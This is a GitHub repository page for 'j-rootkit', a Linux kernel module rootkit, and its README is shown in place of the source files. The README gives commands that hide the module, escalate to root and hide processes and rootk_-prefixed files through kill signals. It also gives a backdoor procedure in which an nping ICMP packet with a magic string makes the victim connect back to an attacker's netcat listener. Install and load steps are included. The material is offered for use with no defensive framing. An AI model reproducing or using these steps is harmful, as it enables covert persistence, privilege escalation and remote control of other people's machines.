Skip to content
/ j-rootkit Public

A linux kernel module rootkit w/ an ICMP backdoor

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

JakeGinesin/j-rootkit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
build
build
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
backdoor-icmp.c
backdoor-icmp.c
 
 
rootkit.c
rootkit.c
 
 

Repository files navigation

j-rootkit

Tested on Ubuntu 22.04 and Debian 12.4

Usage

Hide/Show rootkit in the list of loaded modules ($ lsmod)

$ kill -63 1

When installed it starts hidden. You can only remove it when it's unhidden.

Become root:

$ kill -64 1

Hide process with pid

$ kill -62 <pid>

Unhide process with pid

$ kill -61 <pid>

It also hides every file and directory with prefix rootk_.

Backdoor

On attacker machine start netcat listener on some port:

$ nc -lnvp <port>

Send ICMP ping to victim:

$ nping --icmp -c 1 -dest-ip <victim-ip> --data-string 'wA@2mC!dq <attacker-ip> <port>'

Install

Compile module and backdoor:

$ make
$ make install

Load module:

$ sudo insmod build/rootkit.ko

Remove

Make sure the module is visible in lsmod. To toggle visibility do kill -63 1. Then, remove it with:

$ sudo rmmod rootkit.ko

References

About

A linux kernel module rootkit w/ an ICMP backdoor

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages